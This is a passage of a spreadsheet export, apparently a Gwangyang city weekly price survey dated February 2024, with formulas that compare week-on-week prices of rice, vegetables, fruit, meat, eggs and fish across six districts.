{"text_format":"5","workbook":"xlsx","n_sheets":10,"sheets":["총괄","광양읍1","광양읍2","중마동1","중마동2","광영동","옥곡면","Sheet1","--------","Sheet2"],"props":{"creator":"jj8449","last_modified_by":"user"},"not_rendered":{"defined_names":19,"comments":2},"read":"whole","date_system":"1900"}

{"sheet":"총괄","index":0,"n_rows":100,"n_cols":31,"rows_kept":100,"merged":[[1,0,1,26],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,3,3,4],[3,5,3,8],[3,9,3,11],[3,12,3,14],[3,15,3,17],[3,18,3,20],[3,21,3,23],[3,24,3,26],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
["`"]
["주  간  물  가  조  사  표 (광 양 시 총 괄)"]
["조사일 : 2024. 02. 07."]
["연번","품목","규격·단위","카운트",null,"평     균",{"$nulls":3},"가격동향(광양읍1)",null,null,"가격동향(광양읍2)",null,null,"가격동향(중마동1)",null,null,"가격동향(중마동2)",null,null,"가격동향(광영)",null,null,"가격동향(옥곡)"]
[{"$nulls":3},"전주","금주","전주","금주","증감액","증감율","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액"]
["농·축·수산물(26개 품목)"]
[1,"쌀","일반미 20kg(풍광수토)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(M7,\"<>0\")+COUNTIF(P7,\"<>0\")+COUNTIF(S7,\"<>0\")+COUNTIF(V7,\"<>0\")+COUNTIF(Y7,\"<>0\")","v":6},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(N7,\"<>0\")+COUNTIF(Q7,\"<>0\")+COUNTIF(T7,\"<>0\")+COUNTIF(W7,\"<>0\")+COUNTIF(Z7,\"<>0\")","v":6},{"$f":"IF(D7=0,0,SUM(J7,M7,P7,S7,V7,Y7)/D7)","v":{"v":58516.666666666664,"d":"58,517"}},{"$f":"IF(E7=0,0,SUM(K7,N7,Q7,T7,W7,Z7)/E7)","v":{"v":58325,"d":"58,325"}},{"$f":"SUM(G7-F7)","v":{"v":-191.66666666666424,"d":"-192"}},{"$f":"IF(F7=0,0,((G7-F7)/F7))","v":{"v":-0.003275420108231232,"d":"-0"}},{"$f":"광양읍1!F7","v":{"v":59450,"d":"59,450"}},{"$f":"광양읍1!G7","v":{"v":59450,"d":"59,450"}},{"$f":"광양읍1!H7","v":0},{"$f":"광양읍2!F7","v":{"v":61000,"d":"61,000"}},{"$f":"광양읍2!G7","v":{"v":61000,"d":"61,000"}},{"$f":"광양읍2!H7","v":0},{"$f":"중마동1!F7","v":{"v":64450,"d":"64,450"}},{"$f":"중마동1!G7","v":{"v":64450,"d":"64,450"}},{"$f":"중마동1!H7","v":0},{"$f":"중마동2!F7","v":{"v":59900,"d":"59,900"}},{"$f":"중마동2!G7","v":{"v":59900,"d":"59,900"}},{"$f":"중마동2!H7","v":0},{"$f":"광영동!F7","v":{"v":48800,"d":"48,800"}},{"$f":"광영동!G7","v":{"v":47650,"d":"47,650"}},{"$f":"광영동!H7","v":{"v":-1150,"d":"-1,150"}},{"$f":"옥곡면!F7","v":{"v":57500,"d":"57,500"}},{"$f":"옥곡면!G7","v":{"v":57500,"d":"57,500"}},{"$f":"옥곡면!H7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(M8,\"<>0\")+COUNTIF(P8,\"<>0\")+COUNTIF(S8,\"<>0\")+COUNTIF(V8,\"<>0\")+COUNTIF(Y8,\"<>0\")","v":6},6,{"$f":"IF(D8=0,0,SUM(J8,M8,P8,S8,V8,Y8)/D8)","v":{"v":1460.4166666666667,"d":"1,460"}},{"$f":"IF(E8=0,0,SUM(K8,N8,Q8,T8,W8,Z8)/E8)","v":{"v":1363.3333333333333,"d":"1,363"}},{"$f":"SUM(G8-F8)","v":{"v":-97.08333333333348,"d":"-97"}},{"$f":"IF(F8=0,0,((G8-F8)/F8))","v":{"v":-0.06647646219686172,"d":"-0"}},{"$f":"광양읍1!F8","v":{"v":1312.5,"d":"1,313"}},{"$f":"광양읍1!G8","v":{"v":1085,"d":"1,085"}},{"$f":"광양읍1!H8","v":-227.5},{"$f":"광양읍2!F8","v":{"v":2250,"d":"2,250"}},{"$f":"광양읍2!G8","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!H8","v":-250},{"$f":"중마동1!F8","v":{"v":1500,"d":"1,500"}},{"$f":"중마동1!G8","v":{"v":1245,"d":"1,245"}},{"$f":"중마동1!H8","v":-255},{"$f":"중마동2!F8","v":{"v":1350,"d":"1,350"}},{"$f":"중마동2!G8","v":{"v":1700,"d":"1,700"}},{"$f":"중마동2!H8","v":350},{"$f":"광영동!F8","v":{"v":1000,"d":"1,000"}},{"$f":"광영동!G8","v":{"v":1000,"d":"1,000"}},0,{"$f":"옥곡면!F8","v":{"v":1350,"d":"1,350"}},{"$f":"옥곡면!G8","v":{"v":1150,"d":"1,150"}},{"$f":"옥곡면!H8","v":-200},{"$nulls":3},"("]
[3,"상추","잎상추 500g",6,6,{"v":5838.833333333333,"d":"5,839"},{"v":6509.583333333333,"d":"6,510"},{"$f":"SUM(G9-F9)","v":{"v":670.75,"d":"671"}},{"$f":"IF(F9=0,0,((G9-F9)/F9))","v":{"v":0.1148774013073388,"d":"0"}},{"$f":"광양읍1!F9","v":{"v":6333,"d":"6,333"}},{"$f":"광양읍1!G9","v":{"v":7382.5,"d":"7,383"}},{"$f":"광양읍1!H9","v":1049.5},{"$f":"광양읍2!F9","v":{"v":6250,"d":"6,250"}},{"$f":"광양읍2!G9","v":{"v":6250,"d":"6,250"}},{"$f":"광양읍2!H9","v":0},{"$f":"중마동1!F9","v":{"v":7000,"d":"7,000"}},{"$f":"중마동1!G9","v":{"v":9725,"d":"9,725"}},{"$f":"중마동1!H9","v":{"v":2725,"d":"2,725"}},{"$f":"중마동2!F9","v":{"v":5450,"d":"5,450"}},{"$f":"중마동2!G9","v":{"v":5200,"d":"5,200"}},{"$f":"중마동2!H9","v":-250},{"$f":"광영동!F9","v":{"v":5000,"d":"5,000"}},{"$f":"광영동!G9","v":{"v":5000,"d":"5,000"}},{"$f":"광영동!H9","v":0},{"$f":"옥곡면!F9","v":{"v":5000,"d":"5,000"}},{"$f":"옥곡면!G9","v":{"v":5500,"d":"5,500"}},{"$f":"옥곡면!H9","v":500}]
[4,"양상추","상품1개(500g)",6,6,{"v":2464.1666666666665,"d":"2,464"},{"v":2624.4166666666665,"d":"2,624"},{"$f":"SUM(G10-F10)","v":{"v":160.25,"d":"160"}},{"$f":"IF(F10=0,0,((G10-F10)/F10))","v":{"v":0.06503212715590126,"d":"0"}},{"$f":"광양읍1!F10","v":{"v":1350,"d":"1,350"}},{"$f":"광양읍1!G10","v":{"v":2761.5,"d":"2,762"}},{"$f":"광양읍1!H10","v":1411.5},{"$f":"광양읍2!F10","v":{"v":2750,"d":"2,750"}},{"$f":"광양읍2!G10","v":{"v":2750,"d":"2,750"}},{"$f":"광양읍2!H10","v":0},{"$f":"중마동1!F10","v":{"v":2945,"d":"2,945"}},{"$f":"중마동1!G10","v":{"v":2995,"d":"2,995"}},{"$f":"중마동1!H10","v":50},{"$f":"중마동2!F10","v":{"v":3750,"d":"3,750"}},{"$f":"중마동2!G10","v":{"v":3500,"d":"3,500"}},{"$f":"중마동2!H10","v":-250},{"$f":"광영동!F10","v":{"v":2490,"d":"2,490"}},{"$f":"광영동!G10","v":{"v":2490,"d":"2,490"}},{"$f":"광영동!H10","v":0},{"$f":"옥곡면!F10","v":{"v":1500,"d":"1,500"}},{"$f":"옥곡면!G10","v":{"v":1250,"d":"1,250"}},{"$f":"옥곡면!H10","v":-250}]
[5,"애호박","상품1개(250~300g)",6,6,{"v":2874.1666666666665,"d":"2,874"},{"v":2978.3333333333335,"d":"2,978"},{"$f":"SUM(G11-F11)","v":{"v":104.16666666666697,"d":"104"}},{"$f":"IF(F11=0,0,((G11-F11)/F11))","v":{"v":0.03624238909828947,"d":"0"}},{"$f":"광양읍1!F11","v":{"v":2895,"d":"2,895"}},{"$f":"광양읍1!G11","v":{"v":3145,"d":"3,145"}},{"$f":"광양읍1!H11","v":250},{"$f":"광양읍2!F11","v":{"v":2950,"d":"2,950"}},{"$f":"광양읍2!G11","v":{"v":2950,"d":"2,950"}},{"$f":"광양읍2!H11","v":0},{"$f":"중마동1!F11","v":{"v":2985,"d":"2,985"}},{"$f":"중마동1!G11","v":{"v":3235,"d":"3,235"}},{"$f":"중마동1!H11","v":250},{"$f":"중마동2!F11","v":{"v":3350,"d":"3,350"}},{"$f":"중마동2!G11","v":{"v":3350,"d":"3,350"}},{"$f":"중마동2!H11","v":0},{"$f":"광영동!F11","v":{"v":2740,"d":"2,740"}},{"$f":"광영동!G11","v":{"v":2740,"d":"2,740"}},0,{"$f":"옥곡면!F11","v":{"v":2325,"d":"2,325"}},{"$f":"옥곡면!G11","v":{"v":2450,"d":"2,450"}},{"$f":"옥곡면!H11","v":125}]
[6,"열무","상품 4kg(1단)",3,3,{"v":15800,"d":"15,800"},{"v":15800,"d":"15,800"},{"$f":"SUM(G12-F12)","v":0},{"$f":"IF(F12=0,0,((G12-F12)/F12))","v":0},{"$f":"광양읍1!F12","v":0},{"$f":"광양읍1!G12","v":0},{"$f":"광양읍1!H12","v":0},{"$f":"광양읍2!F12","v":{"v":9400,"d":"9,400"}},{"$f":"광양읍2!G12","v":{"v":9400,"d":"9,400"}},{"$f":"광양읍2!H12","v":0},{"$f":"중마동1!F12","v":{"v":21000,"d":"21,000"}},{"$f":"중마동1!G12","v":{"v":22000,"d":"22,000"}},{"$f":"중마동1!H12","v":{"v":1000,"d":"1,000"}},{"$f":"중마동2!F12","v":{"v":17000,"d":"17,000"}},{"$f":"중마동2!G12","v":{"v":16000,"d":"16,000"}},{"$f":"중마동2!H12","v":{"v":-1000,"d":"-1,000"}},{"$f":"광영동!F12","v":0},{"$f":"광영동!G12","v":0},{"$f":"광영동!H12","v":0},{"$f":"옥곡면!F12","v":0},{"$f":"옥곡면!G12","v":0},{"$f":"옥곡면!H12","v":0}]
[7,"양파","1망 1kg",6,6,{"v":2790,"d":"2,790"},{"v":2800.8333333333335,"d":"2,801"},{"v":10.833333333333485,"d":"11"},{"v":0.003882915173237808,"d":"0"},{"$f":"광양읍1!F13","v":{"v":3345,"d":"3,345"}},{"$f":"광양읍1!G13","v":{"v":2995,"d":"2,995"}},{"$f":"광양읍1!H13","v":-350},{"$f":"광양읍2!F13","v":{"v":3000,"d":"3,000"}},{"$f":"광양읍2!G13","v":{"v":3000,"d":"3,000"}},{"$f":"광양읍2!H13","v":0},{"$f":"중마동1!F13","v":{"v":3350,"d":"3,350"}},{"$f":"중마동1!G13","v":{"v":3350,"d":"3,350"}},{"$f":"중마동1!H13","v":0},{"$f":"중마동2!F13","v":{"v":2990,"d":"2,990"}},{"$f":"중마동2!G13","v":{"v":2990,"d":"2,990"}},{"$f":"중마동2!H13","v":0},{"$f":"광영동!F13","v":{"v":1915,"d":"1,915"}},{"$f":"광영동!G13","v":{"v":2330,"d":"2,330"}},{"$f":"광영동!H13","v":415},{"$f":"옥곡면!F13","v":{"v":2140,"d":"2,140"}},{"$f":"옥곡면!G13","v":{"v":2140,"d":"2,140"}},{"$f":"옥곡면!H13","v":0}]
[8,"오이","상품 3개",6,6,{"$f":"IF(D14=0,0,SUM(J14,M14,P14,S14,V14,Y14)/D14)","v":{"v":5047.083333333333,"d":"5,047"}},{"v":5178.75,"d":"5,179"},{"v":131.66666666666697,"d":"132"},{"v":0.02608767439940566,"d":"0"},{"$f":"광양읍1!F14","v":{"v":5242.5,"d":"5,243"}},{"$f":"광양읍1!G14","v":{"v":5442.5,"d":"5,443"}},{"$f":"광양읍1!H14","v":200},{"$f":"광양읍2!F14","v":{"v":5000,"d":"5,000"}},{"$f":"광양읍2!G14","v":{"v":5000,"d":"5,000"}},{"$f":"광양읍2!H14","v":0},{"$f":"중마동1!F14","v":{"v":5370,"d":"5,370"}},{"$f":"중마동1!G14","v":{"v":5510,"d":"5,510"}},{"$f":"중마동1!H14","v":140},{"$f":"중마동2!F14","v":{"v":5250,"d":"5,250"}},{"$f":"중마동2!G14","v":{"v":5700,"d":"5,700"}},{"$f":"중마동2!H14","v":450},{"$f":"광영동!F14","v":{"v":5220,"d":"5,220"}},{"$f":"광영동!G14","v":{"v":5220,"d":"5,220"}},{"$f":"광영동!H14","v":0},{"$f":"옥곡면!F14","v":{"v":4200,"d":"4,200"}},{"$f":"옥곡면!G14","v":{"v":4200,"d":"4,200"}},{"$f":"옥곡면!H14","v":0}]
[9,"풋고추","신선한것 1kg",6,6,{"v":16269.083333333334,"d":"16,269"},{"v":18970.75,"d":"18,971"},{"v":2701.666666666666,"d":"2,702"},{"v":0.1660613945674054,"d":"0"},{"$f":"광양읍1!F15","v":{"v":24114.5,"d":"24,115"}},{"$f":"광양읍1!G15","v":{"v":25559.5,"d":"25,560"}},{"$f":"광양읍1!H15","v":1445},{"$f":"광양읍2!F15","v":{"v":20000,"d":"20,000"}},{"$f":"광양읍2!G15","v":{"v":20000,"d":"20,000"}},{"$f":"광양읍2!H15","v":0},{"$f":"중마동1!F15","v":{"v":14250,"d":"14,250"}},{"$f":"중마동1!G15","v":{"v":25015,"d":"25,015"}},{"$f":"중마동1!H15","v":{"v":10765,"d":"10,765"}},{"$f":"중마동2!F15","v":{"v":18500,"d":"18,500"}},{"$f":"중마동2!G15","v":{"v":18500,"d":"18,500"}},{"$f":"중마동2!H15","v":0},{"$f":"광영동!F15","v":{"v":10000,"d":"10,000"}},{"$f":"광영동!G15","v":{"v":13250,"d":"13,250"}},{"$f":"광영동!H15","v":{"v":3250,"d":"3,250"}},{"$f":"옥곡면!F15","v":{"v":10750,"d":"10,750"}},{"$f":"옥곡면!G15","v":{"v":11500,"d":"11,500"}},{"$f":"옥곡면!H15","v":750}]
[10,"마늘","깐것 상품 1kg",6,6,{"v":9907.5,"d":"9,908"},{"$f":"IF(E16=0,0,SUM(K16,N16,Q16,T16,W16,Z16)/E16)","v":{"v":9465.833333333334,"d":"9,466"}},{"v":-441.66666666666606,"d":"-442"},{"v":-0.044579022625956706,"d":"-0"},{"$f":"광양읍1!F16","v":{"v":9900,"d":"9,900"}},{"$f":"광양읍1!G16","v":{"v":9900,"d":"9,900"}},{"$f":"광양읍1!H16","v":0},{"$f":"광양읍2!F16","v":{"v":11500,"d":"11,500"}},{"$f":"광양읍2!G16","v":{"v":11500,"d":"11,500"}},{"$f":"광양읍2!H16","v":0},{"$f":"중마동1!F16","v":{"v":9245,"d":"9,245"}},{"$f":"중마동1!G16","v":{"v":8695,"d":"8,695"}},{"$f":"중마동1!H16","v":-550},{"$f":"중마동2!F16","v":{"v":8900,"d":"8,900"}},{"$f":"중마동2!G16","v":{"v":8900,"d":"8,900"}},{"$f":"중마동2!H16","v":0},{"$f":"광영동!F16","v":{"v":9300,"d":"9,300"}},{"$f":"광영동!G16","v":{"v":9300,"d":"9,300"}},{"$f":"광영동!H16","v":0},{"$f":"옥곡면!F16","v":{"v":10600,"d":"10,600"}},{"$f":"옥곡면!G16","v":{"v":8500,"d":"8,500"}},{"$f":"옥곡면!H16","v":{"v":-2100,"d":"-2,100"}}]
[11,"감자","흰색 1kg",6,6,{"v":4524.083333333333,"d":"4,524"},{"v":4666.666666666667,"d":"4,667"},{"v":142.58333333333394,"d":"143"},{"v":0.03151651347418459,"d":"0"},{"$f":"광양읍1!F17","v":{"v":6449.5,"d":"6,450"}},{"$f":"광양읍1!G17","v":{"v":5950,"d":"5,950"}},{"$f":"광양읍1!H17","v":-499.5},{"$f":"광양읍2!F17","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍2!G17","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍2!H17","v":0},{"$f":"중마동1!F17","v":{"v":5545,"d":"5,545"}},{"$f":"중마동1!G17","v":{"v":5660,"d":"5,660"}},{"$f":"중마동1!H17","v":115},{"$f":"중마동2!F17","v":{"v":3000,"d":"3,000"}},{"$f":"중마동2!G17","v":{"v":3740,"d":"3,740"}},{"$f":"중마동2!H17","v":740},{"$f":"광영동!F17","v":{"v":3900,"d":"3,900"}},{"$f":"광영동!G17","v":{"v":4150,"d":"4,150"}},{"$f":"광영동!H17","v":250},{"$f":"옥곡면!F17","v":{"v":3750,"d":"3,750"}},{"$f":"옥곡면!G17","v":{"v":4000,"d":"4,000"}},{"$f":"옥곡면!H17","v":250}]
[12,"배추","1포기 3kg",6,6,{"v":3495.8333333333335,"d":"3,496"},{"v":3537.5,"d":"3,538"},{"v":41.666666666666515,"d":"42"},{"v":0.011918951132300314,"d":"0"},{"$f":"광양읍1!F18","v":{"v":4795,"d":"4,795"}},{"$f":"광양읍1!G18","v":{"v":4995,"d":"4,995"}},{"$f":"광양읍1!H18","v":200},{"$f":"광양읍2!F18","v":{"v":3650,"d":"3,650"}},{"$f":"광양읍2!G18","v":{"v":3650,"d":"3,650"}},{"$f":"광양읍2!H18","v":0},{"$f":"중마동1!F18","v":{"v":3380,"d":"3,380"}},{"$f":"중마동1!G18","v":{"v":3850,"d":"3,850"}},{"$f":"중마동1!H18","v":470},{"$f":"중마동2!F18","v":{"v":3450,"d":"3,450"}},{"$f":"중마동2!G18","v":{"v":3750,"d":"3,750"}},{"$f":"중마동2!H18","v":300},{"$f":"광영동!F18","v":{"v":3500,"d":"3,500"}},{"$f":"광영동!G18","v":{"v":2980,"d":"2,980"}},{"$f":"광영동!H18","v":-520},{"$f":"옥곡면!F18","v":{"v":2200,"d":"2,200"}},{"$f":"옥곡면!G18","v":{"v":2000,"d":"2,000"}},{"$f":"옥곡면!H18","v":-200}]
[13,"콩나물","1봉지 500g ",6,6,{"v":1837.0833333333333,"d":"1,837"},{"v":1837.0833333333333,"d":"1,837"},0,0,{"$f":"광양읍1!F19","v":{"v":2157.5,"d":"2,158"}},{"$f":"광양읍1!G19","v":{"v":2157.5,"d":"2,158"}},{"$f":"광양읍1!H19","v":0},{"$f":"광양읍2!F19","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!G19","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!H19","v":0},{"$f":"중마동1!F19","v":{"v":2235,"d":"2,235"}},{"$f":"중마동1!G19","v":{"v":2235,"d":"2,235"}},{"$f":"중마동1!H19","v":0},{"$f":"중마동2!F19","v":{"v":1650,"d":"1,650"}},{"$f":"중마동2!G19","v":{"v":1650,"d":"1,650"}},{"$f":"중마동2!H19","v":0},{"$f":"광영동!F19","v":{"v":1490,"d":"1,490"}},{"$f":"광영동!G19","v":{"v":1490,"d":"1,490"}},{"$f":"광영동!H19","v":0},{"$f":"옥곡면!F19","v":{"v":1490,"d":"1,490"}},{"$f":"옥곡면!G19","v":{"v":1490,"d":"1,490"}},{"$f":"옥곡면!H19","v":0}]
[14,"사과","상품 1개(300∼350g)",6,6,{"v":4125,"d":"4,125"},{"v":4038.3333333333335,"d":"4,038"},{"v":-86.66666666666652,"d":"-87"},{"v":-0.021010101010100973,"d":"-0"},{"$f":"광양읍1!F20","v":{"v":4650,"d":"4,650"}},{"$f":"광양읍1!G20","v":{"v":5250,"d":"5,250"}},{"$f":"광양읍1!H20","v":600},{"$f":"광양읍2!F20","v":{"v":3725,"d":"3,725"}},{"$f":"광양읍2!G20","v":{"v":3725,"d":"3,725"}},{"$f":"광양읍2!H20","v":0},{"$f":"중마동1!F20","v":{"v":3795,"d":"3,795"}},{"$f":"중마동1!G20","v":{"v":4600,"d":"4,600"}},{"$f":"중마동1!H20","v":805},{"$f":"중마동2!F20","v":{"v":4000,"d":"4,000"}},{"$f":"중마동2!G20","v":{"v":4150,"d":"4,150"}},{"$f":"중마동2!H20","v":150},{"$f":"광영동!F20","v":{"v":4580,"d":"4,580"}},{"$f":"광영동!G20","v":{"v":3455,"d":"3,455"}},{"$f":"광영동!H20","v":{"v":-1125,"d":"-1,125"}},{"$f":"옥곡면!F20","v":{"v":4000,"d":"4,000"}},{"$f":"옥곡면!G20","v":{"v":3050,"d":"3,050"}},{"$f":"옥곡면!H20","v":-950}]
[15,"배","상품 1개(650∼700g)",6,6,{"v":4878.333333333333,"d":"4,878"},{"v":4749.416666666667,"d":"4,749"},{"v":-128.91666666666606,"d":"-129"},{"v":-0.026426375128117404,"d":"-0"},{"$f":"광양읍1!F21","v":{"v":5250,"d":"5,250"}},{"$f":"광양읍1!G21","v":{"v":5850,"d":"5,850"}},{"$f":"광양읍1!H21","v":600},{"$f":"광양읍2!F21","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍2!G21","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍2!H21","v":0},{"$f":"중마동1!F21","v":{"v":5890,"d":"5,890"}},{"$f":"중마동1!G21","v":{"v":6100,"d":"6,100"}},{"$f":"중마동1!H21","v":210},{"$f":"중마동2!F21","v":{"v":4000,"d":"4,000"}},{"$f":"중마동2!G21","v":{"v":4000,"d":"4,000"}},{"$f":"중마동2!H21","v":0},{"$f":"광영동!F21","v":{"v":5130,"d":"5,130"}},{"$f":"광영동!G21","v":{"v":3980,"d":"3,980"}},{"$f":"광영동!H21","v":{"v":-1150,"d":"-1,150"}},{"$f":"옥곡면!F21","v":{"v":4500,"d":"4,500"}},{"$f":"옥곡면!G21","v":{"v":4066.5,"d":"4,067"}},{"$f":"옥곡면!H21","v":{"v":-433.5,"d":"-434"}}]
[16,"바나나","상품 1kg",6,6,{"v":3476.4166666666665,"d":"3,476"},{"v":3733.1666666666665,"d":"3,733"},{"v":256.75,"d":"257"},{"v":0.07385478342162667,"d":"0"},{"$f":"광양읍1!F22","v":{"v":3093.5,"d":"3,094"}},{"$f":"광양읍1!G22","v":{"v":4204,"d":"4,204"}},{"$f":"광양읍1!H22","v":1110.5},{"$f":"광양읍2!F22","v":{"v":3500,"d":"3,500"}},{"$f":"광양읍2!G22","v":{"v":3550,"d":"3,550"}},{"$f":"광양읍2!H22","v":50},{"$f":"중마동1!F22","v":{"v":3740,"d":"3,740"}},{"$f":"중마동1!G22","v":{"v":3870,"d":"3,870"}},{"$f":"중마동1!H22","v":130},{"$f":"중마동2!F22","v":{"v":3745,"d":"3,745"}},{"$f":"중마동2!G22","v":{"v":3750,"d":"3,750"}},{"$f":"중마동2!H22","v":5},{"$f":"광영동!F22","v":{"v":3690,"d":"3,690"}},{"$f":"광영동!G22","v":{"v":3900,"d":"3,900"}},{"$f":"광영동!H22","v":210},{"$f":"옥곡면!F22","v":{"v":3090,"d":"3,090"}},{"$f":"옥곡면!G22","v":{"v":3125,"d":"3,125"}},{"$f":"옥곡면!H22","v":35}]
[17,"쇠고기\n(한우)","등심 600g(상등육)",6,6,{"v":55500,"d":"55,500"},{"v":51658.333333333336,"d":"51,658"},{"v":-3841.6666666666642,"d":"-3,842"},{"v":-0.06921921921921917,"d":"-0"},{"$f":"광양읍1!F23","v":{"v":66000,"d":"66,000"}},{"$f":"광양읍1!G23","v":{"v":41250,"d":"41,250"}},{"$f":"광양읍1!H23","v":-24750},{"$f":"광양읍2!F23","v":{"v":60500,"d":"60,500"}},{"$f":"광양읍2!G23","v":{"v":60500,"d":"60,500"}},{"$f":"광양읍2!H23","v":0},{"$f":"중마동1!F23","v":{"v":54400,"d":"54,400"}},{"$f":"중마동1!G23","v":{"v":60900,"d":"60,900"}},{"$f":"중마동1!H23","v":{"v":6500,"d":"6,500"}},{"$f":"중마동2!F23","v":{"v":73200,"d":"73,200"}},{"$f":"중마동2!G23","v":{"v":67200,"d":"67,200"}},{"$f":"중마동2!H23","v":{"v":-6000,"d":"-6,000"}},{"$f":"광영동!F23","v":{"v":53400,"d":"53,400"}},{"$f":"광영동!G23","v":{"v":53400,"d":"53,400"}},{"$f":"광영동!H23","v":0},{"$f":"옥곡면!F23","v":{"v":25500,"d":"25,500"}},{"$f":"옥곡면!G23","v":{"v":26700,"d":"26,700"}},{"$f":"옥곡면!H23","v":{"v":1200,"d":"1,200"}}]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",3,3,{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0,0,{"$f":"광양읍1!F24","v":0},{"$f":"광양읍1!G24","v":0},{"$f":"광양읍1!H24","v":0},{"$f":"광양읍2!F24","v":{"v":27900,"d":"27,900"}},{"$f":"광양읍2!G24","v":{"v":27900,"d":"27,900"}},{"$f":"광양읍2!H24","v":0},{"$f":"중마동1!F24","v":{"v":11100,"d":"11,100"}},{"$f":"중마동1!G24","v":{"v":11100,"d":"11,100"}},{"$f":"중마동1!H24","v":0},{"$f":"중마동2!F24","v":0},{"$f":"중마동2!G24","v":0},{"$f":"중마동2!H24","v":0},{"$f":"광영동!F24","v":{"v":12000,"d":"12,000"}},{"$f":"광영동!G24","v":{"v":12000,"d":"12,000"}},{"$f":"광영동!H24","v":0},{"$f":"옥곡면!F24","v":0},{"$f":"옥곡면!G24","v":0},{"$f":"옥곡면!H24","v":0}]
[19,"돼지고기","삼겹살 600g(상등육)",6,6,{"v":12438.333333333334,"d":"12,438"},{"v":12446.666666666666,"d":"12,447"},{"v":8.33333333333212,"d":"8"},{"v":0.0006699718611817328,"d":"0"},{"$f":"광양읍1!F25","v":{"v":14100,"d":"14,100"}},{"$f":"광양읍1!G25","v":{"v":14100,"d":"14,100"}},{"$f":"광양읍1!H25","v":0},{"$f":"광양읍2!F25","v":{"v":16450,"d":"16,450"}},{"$f":"광양읍2!G25","v":{"v":16450,"d":"16,450"}},{"$f":"광양읍2!H25","v":0},{"$f":"중마동1!F25","v":{"v":13390,"d":"13,390"}},{"$f":"중마동1!G25","v":{"v":14880,"d":"14,880"}},{"$f":"중마동1!H25","v":{"v":1490,"d":"1,490"}},{"$f":"중마동2!F25","v":{"v":12810,"d":"12,810"}},{"$f":"중마동2!G25","v":{"v":12240,"d":"12,240"}},{"$f":"중마동2!H25","v":-570},{"$f":"광영동!F25","v":{"v":12840,"d":"12,840"}},{"$f":"광영동!G25","v":{"v":11940,"d":"11,940"}},{"$f":"광영동!H25","v":-900},{"$f":"옥곡면!F25","v":{"v":5040,"d":"5,040"}},{"$f":"옥곡면!G25","v":{"v":5070,"d":"5,070"}},{"$f":"옥곡면!H25","v":30}]
[20,"닭고기","육계 1마리(1kg 정도)",6,6,{"v":7724.166666666667,"d":"7,724"},{"v":7849.166666666667,"d":"7,849"},125,{"v":0.016182975509763727,"d":"0"},{"$f":"광양읍1!F26","v":{"v":7150,"d":"7,150"}},{"$f":"광양읍1!G26","v":{"v":7250,"d":"7,250"}},{"$f":"광양읍1!H26","v":100},{"$f":"광양읍2!F26","v":{"v":8250,"d":"8,250"}},{"$f":"광양읍2!G26","v":{"v":8250,"d":"8,250"}},{"$f":"광양읍2!H26","v":0},{"$f":"중마동1!F26","v":{"v":7845,"d":"7,845"}},{"$f":"중마동1!G26","v":{"v":8495,"d":"8,495"}},{"$f":"중마동1!H26","v":650},{"$f":"중마동2!F26","v":{"v":7950,"d":"7,950"}},{"$f":"중마동2!G26","v":{"v":7950,"d":"7,950"}},{"$f":"중마동2!H26","v":0},{"$f":"광영동!F26","v":{"v":8250,"d":"8,250"}},{"$f":"광영동!G26","v":{"v":8250,"d":"8,250"}},{"$f":"광영동!H26","v":0},{"$f":"옥곡면!F26","v":{"v":6900,"d":"6,900"}},{"$f":"옥곡면!G26","v":{"v":6900,"d":"6,900"}},{"$f":"옥곡면!H26","v":0}]
[21,"달걀","특란 30개 한판",6,6,{"v":8160.833333333333,"d":"8,161"},{"v":8081.666666666667,"d":"8,082"},{"v":-79.16666666666606,"d":"-79"},{"v":-0.009700806698662235,"d":"-0"},{"$f":"광양읍1!F27","v":{"v":7920,"d":"7,920"}},{"$f":"광양읍1!G27","v":{"v":6920,"d":"6,920"}},{"$f":"광양읍1!H27","v":-1000},{"$f":"광양읍2!F27","v":{"v":8400,"d":"8,400"}},{"$f":"광양읍2!G27","v":{"v":8250,"d":"8,250"}},{"$f":"광양읍2!H27","v":-150},{"$f":"중마동1!F27","v":{"v":7595,"d":"7,595"}},{"$f":"중마동1!G27","v":{"v":8195,"d":"8,195"}},{"$f":"중마동1!H27","v":600},{"$f":"중마동2!F27","v":{"v":8475,"d":"8,475"}},{"$f":"중마동2!G27","v":{"v":8475,"d":"8,475"}},{"$f":"중마동2!H27","v":0},{"$f":"광영동!F27","v":{"v":8200,"d":"8,200"}},{"$f":"광영동!G27","v":{"v":8200,"d":"8,200"}},{"$f":"광영동!H27","v":0},{"$f":"옥곡면!F27","v":{"v":8375,"d":"8,375"}},{"$f":"옥곡면!G27","v":{"v":8450,"d":"8,450"}},{"$f":"옥곡면!H27","v":75}]
[22,"조기","15cm 1마리",6,6,{"v":2096.3333333333335,"d":"2,096"},{"v":2356.6666666666665,"d":"2,357"},{"v":260.33333333333303,"d":"260"},{"v":0.12418508506916824,"d":"0"},{"$f":"광양읍1!F28","v":{"v":1633,"d":"1,633"}},{"$f":"광양읍1!G28","v":{"v":2600,"d":"2,600"}},{"$f":"광양읍1!H28","v":967},{"$f":"광양읍2!F28","v":{"v":2750,"d":"2,750"}},{"$f":"광양읍2!G28","v":{"v":2750,"d":"2,750"}},{"$f":"광양읍2!H28","v":0},{"$f":"중마동1!F28","v":{"v":2390,"d":"2,390"}},{"$f":"중마동1!G28","v":{"v":2735,"d":"2,735"}},{"$f":"중마동1!H28","v":345},{"$f":"중마동2!F28","v":{"v":1405,"d":"1,405"}},{"$f":"중마동2!G28","v":{"v":1405,"d":"1,405"}},{"$f":"중마동2!H28","v":0},{"$f":"광영동!F28","v":{"v":2900,"d":"2,900"}},{"$f":"광영동!G28","v":{"v":2900,"d":"2,900"}},{"$f":"광영동!H28","v":0},{"$f":"옥곡면!F28","v":{"v":1500,"d